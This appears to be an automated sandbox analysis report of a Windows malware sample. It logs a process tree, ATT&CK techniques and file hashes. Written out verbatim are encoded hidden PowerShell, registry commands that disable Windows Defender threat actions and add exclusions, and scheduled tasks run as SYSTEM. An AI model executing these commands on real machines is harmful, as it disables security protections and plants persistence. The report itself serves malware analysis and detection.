C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 3624 -ip 36241⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1576 -ip 15761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4296 -ip 42961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3124 -ip 31241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3624 -ip 36241⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 548 -p 4544 -ip 45441⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 1388 -ip 13881⤵
- Loads dropped DLL
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4296 -ip 42961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3124 -ip 31241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 3624 -ip 36241⤵
-
C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\sOpKwDq.exeC:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\sOpKwDq.exe j6 /site_id 525403 /S1⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkjLMAfZd" /SC once /ST 00:38:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkjLMAfZd"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkjLMAfZd"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CHeJVxoJwhzmREGSo" /SC once /ST 02:57:23 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\XxxLGMW.exe\" sG /site_id 525403 /S" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "CHeJVxoJwhzmREGSo"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3416 -ip 34161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3416 -ip 34161⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3124 -ip 31241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3624 -ip 36241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3624 -ip 36241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3124 -ip 31241⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 656 -p 5404 -ip 54041⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 672 -p 5544 -ip 55441⤵
-
C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\XxxLGMW.exeC:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\XxxLGMW.exe sG /site_id 525403 /S1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "booXbIzkEgfNdKvxAC"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\QMuGxDzxU\dsxDUM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "cPyDayBYNpjUpuO" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cPyDayBYNpjUpuO2" /F /xml "C:\Program Files (x86)\QMuGxDzxU\PKBVUtZ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "cPyDayBYNpjUpuO"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "cPyDayBYNpjUpuO"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CKLLrKbBjRttlf" /F /xml "C:\Program Files (x86)\YhmfbgEUeceU2\HzNRJZl.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QtMzpEnQzbovF2" /F /xml "C:\ProgramData\hnkumIqTRwUxQLVB\IGQiZES.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jDcNWoQEywoxNtiMi2" /F /xml "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\AjrXMWl.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DwrQigzmMruJpsQaMBv2" /F /xml "C:\Program Files (x86)\iTBLcazoBHNRC\TXhyGMl.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4232 -ip 42321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4232 -ip 42321⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
4Disabling Security Tools
1Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751MD5
54e9306f95f32e50ccd58af19753d929
SHA1eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA25645f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA5128711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751MD5
d6f25f609b4ccc1360a8c895dba834cc
SHA1db7ae89976ee48369c70d76096280a171b87de1a
SHA2566b83568f374758c6305ead8f6bd26bf3c16e2776f9373c61edd1bf26d0eb1966
SHA512252cf2b42f2ac2c2a864164290a3d6f5041e7b53ec92b93c9eb0699cce0855728beefc88c59acd526ea94ac7a1ec8d438a922dc91406a04da9bbeed4ef551f70
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Tue026e94a5005f8.exe.logMD5
e5352797047ad2c91b83e933b24fbc4f
SHA19bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827
-
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02520f255d0ba43a.exeMD5
c423fce1a632173c50688085267f7c08
SHA180fe9f218344027cc2ecaff961f925535bb77c31
SHA2567a7451bf22fdc92d12a8eadde0e1c7a81e11c187f7d714f3991b0c6bfad94e72
SHA5127ef954b9f94357ce96b1cb0594a46ab09313220075492d653e6fb59c4103d5042a34efcf53167bb6203696e1903ddd6cb4caff3677b9a9b276f3ab8d4769a389
-
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02520f255d0ba43a.exeMD5
c423fce1a632173c50688085267f7c08
SHA180fe9f218344027cc2ecaff961f925535bb77c31
SHA2567a7451bf22fdc92d12a8eadde0e1c7a81e11c187f7d714f3991b0c6bfad94e72
SHA5127ef954b9f94357ce96b1cb0594a46ab09313220075492d653e6fb59c4103d5042a34efcf53167bb6203696e1903ddd6cb4caff3677b9a9b276f3ab8d4769a389
-
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02522f9ea0b1.exeMD5
2028d287002527e45e29f6e9bfe31f83
SHA151a78b6e956408348c2847f27badb633320efe82
